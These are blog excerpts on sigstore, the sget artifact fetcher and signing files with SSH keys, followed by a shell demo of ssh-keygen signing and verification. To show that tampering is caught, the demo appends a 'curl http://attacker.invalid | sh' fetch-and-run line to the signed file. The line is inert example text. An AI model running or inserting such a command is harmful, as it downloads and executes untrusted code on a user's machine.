A Safer curl | bash ?

This post is about using container registries (Docker registries, OCI registries, whatever you want to call them) for the storage and distribution of generic, non-container-related binary artifacts. I explain the reasoning below, but first: code and demos. Demos! Here’s a quick walkthrough of a draft tool (still WIP!) to securely fetch published contents from an OCI registry, called sget. sget is part of the sigstore project, and is a standalone client that allows you to retrieve scripts or binaries from any OCI registry.

Sigstore Project Update — April 2021

Time flies in open source! This post provides a few updates on Sigstore since our last update in March. We’ve been lucky to continue welcoming new community members and contributors, with 39 contributors from over 15 companies, and our Slack channel is rapidly approaching 300 members! Let’s jump into some more project updates. Rekor: as mentioned above, the Rekor binary transparency log now natively supports signed JARs.

SSH is the new GPG

Not really. But kind of? Did you know that you probably already have a working PKI system for signing artifacts on your laptop today, with no keyservers, web-of-trust, or configuration? You can use it to sign files, and to find the public keys for other people and use them to verify files they signed. So why aren’t more people using this? I think it’s just gone overlooked because it’s a relatively new feature in a pretty old piece of software.
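The feature the post is hinting at is ssh-keygen's -Y mode (OpenSSH 8.0 and later), which signs and verifies arbitrary files with ordinary SSH keys. The script below is an added example, not code from the post or from the sigstore project: it generates a throwaway ed25519 key in a temporary directory, signs a small constructed file, verifies it against an allowed_signers file, then tampers with the file and confirms the verification fails. The signer identity alice@example.com, the namespace "file", and the file contents are all assumptions made for the demo; it assumes ssh-keygen is on PATH.

```shell
# Added example (not from the original post): sign and verify a file with an
# SSH key via `ssh-keygen -Y`. Identity, namespace and file contents are made
# up for the demo. Prints "ok" on success, returns non-zero on any failure.
ssh_sign_demo() {
  work="$(mktemp -d)" || return 1

  # Throwaway ed25519 signing key with no passphrase, standing in for the
  # ~/.ssh/id_ed25519 most people already have.
  ssh-keygen -q -t ed25519 -N '' -C 'alice@example.com' \
      -f "$work/id_ed25519" >/dev/null 2>&1 || return 1

  # The artifact to sign (constructed for the demo).
  printf 'echo hello from a signed script\n' > "$work/install.sh"

  # Sign: -n sets the signature namespace ("file" is the convention for
  # arbitrary files); a detached signature is written to install.sh.sig.
  ssh-keygen -Y sign -f "$work/id_ed25519" -n file "$work/install.sh" \
      >/dev/null 2>&1 || return 1

  # The verifier's entire trust store: one line mapping an identity to a
  # public key. This is what replaces keyservers and the web of trust.
  printf 'alice@example.com %s\n' "$(cat "$work/id_ed25519.pub")" \
      > "$work/allowed_signers"

  # Verify the untouched file: the data is read from stdin, the signature
  # from -s, and the key must match both the -I identity and the -n namespace.
  ssh-keygen -Y verify -f "$work/allowed_signers" -I alice@example.com \
      -n file -s "$work/install.sh.sig" < "$work/install.sh" \
      >/dev/null 2>&1 || return 1

  # Tamper with the file after signing: verification must now fail.
  printf 'curl http://attacker.invalid | sh\n' >> "$work/install.sh"
  if ssh-keygen -Y verify -f "$work/allowed_signers" -I alice@example.com \
      -n file -s "$work/install.sh.sig" < "$work/install.sh" \
      >/dev/null 2>&1; then
    return 1
  fi

  rm -rf "$work"
  echo ok
}

ssh_sign_demo
```

The namespace passed with -n is part of what is signed, so a signature made for "file" cannot be replayed as, say, a git commit signature. To verify someone else's files you only need their public key in allowed_signers; for GitHub users the keys are published at https://github.com/USERNAME.keys, which is the "find the public keys for other people" part of the post.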